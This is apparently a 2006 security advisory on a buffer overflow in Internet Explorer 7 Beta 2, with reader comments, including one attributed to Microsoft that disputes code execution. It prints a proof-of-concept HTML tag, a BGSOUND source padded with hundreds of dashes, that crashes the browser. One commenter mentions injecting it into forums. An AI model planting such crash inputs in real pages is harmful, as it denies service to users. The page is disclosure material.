|
|
| |
| A buffer overflow within Internet Explorer 7 Beta 2 allows attackers to execute arbitrary code or cause a DoS and crash the program. |
| |
Credit:
The information has been provided by Tom Ferris.
The original article can be found at: http://www.security-protocols.com/advisory/sp-x23-advisory.txt
Tom Ferris blog about the vulnerability can be found at: http://security-protocols.com/modules.php?name=News&file=article&sid=3169
|
| |
Vulnerable Systems:
* Internet Explorer version 7.0 Beta 2 (7.0.5296.0)
When running a specially crafted .html file, urlmon.dll inproperly parses the 'BGSOUND SRC=file://---' (approx. 344 dashes) and causes the crash.
The following HTML code will trigger the crash:
<BGSOUND SRC=file://-----------------------------------------
------------------------------------------------------------------------------- ------------------------------------------------------------------------------- --------------------------------------------------------------------------------
---------------------------------------------------------------- >
Or access the following URL: http://www.security-protocols.com/poc/sp-x23.html
|
| Subject:
|
Remote code execution is not possible |
Date: |
5 Feb. 2006 |
| From: |
Raul |
We did confirm that the bug crashes IE. However, we did not find that the bug was exploitable by default to elevate privilege and run arbitrary code.
This bug had already been found during our code review and analysis that is a mandatory part of our development process; it was scheduled to be fixed before our next public release. We do not believe this bug is easily exploitable, and as an extra defense, the /GS flag also catches the overrun. This is a compiler flag that tells Windows to watch for some classes of buffer overflows. If Windows sees a problem, it kills the application, in this case IE, instead of running the exploit code. While this is certainly not our primary line of protection, it does offer defense-in-depth to help keep our customers secure.
At this time, we are not aware of any active exploits taking advantage of this bug. We will continue to monitor the situation and evaluate our response.
http://blogs.msdn.com/ie/ |
|
| Subject:
|
IE bug |
Date: |
7 Feb. 2006 |
| From: |
sardanapalo |
IE sux!
So do micro$oft development skillz... |
|
| Subject:
|
Re: IE bug |
Date: |
8 Feb. 2006 |
| From: |
GrrWooD |
I have to say that was a dumb missinformed statement if you had
a chance to sit down and look at some of the code comming out of
microsoft you would know better. just cause you have to pay for
microsoft does not mean that it is a flawed product.
also given that they have opened there testing phase to the public
given every one with a keyboard a chance to tell them what is wrong
with there product or what they would like to see added to there
product is what you usually see with open source "e;giving the cutomer
what they want not what they think you want"e; |
|
| Subject:
|
Should a subject really be required |
Date: |
8 Feb. 2006 |
| From: |
WhiteAcid |
sardanapalo; I'd like to see you make something better. I infact really like the new beta versions of IE, I will most likely only use them to test my web applications as it's not my primary browser but I still think it is a great improvement of the previous version. As ben goodger said, a browser battle will always benefit the users :)
Raul, I wouldn't say that the bug is difficult to take advantage of, the web developer simply needs to include some code into the source code fo the site. I doubt you'll see this bug being used for anything other than people playing small practical jokes, so it's severity is low. That doesn't mean that it's difficult to take advantage of. Just imagine if someone could XSS that code into a forum, it'd make the thread unreadble by IE7 users.
What puzzles me is how you would go about finding a bug like this. The original author said:
"e;So I saw that Microsoft released IE 7.0 Beta 2 to the public today. So, I figured I would give it a quick look at and I just happened to find something within the first 15 minutes into testing."e;
To me that insinuates that he was simply browsing, why would he 'by chance' visit a page with that code on it? |
|
| Subject:
|
IE BuG |
Date: |
27 Feb. 2006 |
| From: |
ahab |
| If Windows sees a problem, it kills the application, in this case IE, instead of running the exploit code. While this is certainly not our primary line of protection, it does offer defense-in-depth to help keep our customers secure. |
|
| Subject:
|
david |
Date: |
6 Jul. 2006 |
| From: |
m_datohotmail.com |
| samsing wrong with my explorer .i wont to redownload it |
|
|
|
|
